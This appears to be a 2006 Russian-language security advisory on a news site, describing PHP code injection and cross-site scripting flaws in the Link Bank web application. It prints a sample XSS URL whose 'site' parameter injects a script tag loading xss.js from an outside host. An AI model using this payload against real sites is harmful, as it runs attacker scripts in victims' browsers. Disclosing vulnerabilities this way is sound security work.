Категория > Новости мира Интернет > Межсайтовый скриптинг и PHP-инклюдинг в Link Bank - «Интернет»
Межсайтовый скриптинг и PHP-инклюдинг в Link Bank - «Интернет»20-03-2006, 08:00. Автор: Hancock |
Программа: Link Bank, возможно более ранние версии Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "url_name" и "url" во время добавления ссылки. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP код на целевой системе с привилегиями Web сервера. Пример: 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "site" сценария "iframe.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript src=http://notlegal.ws/xss.js%3E%3C/script%3E URL производителя: daverave.64digits.com/index.php?page=linkbank Решение: Способов устранения уязвимости не существует в настоящее время. Перейти обратно к новости |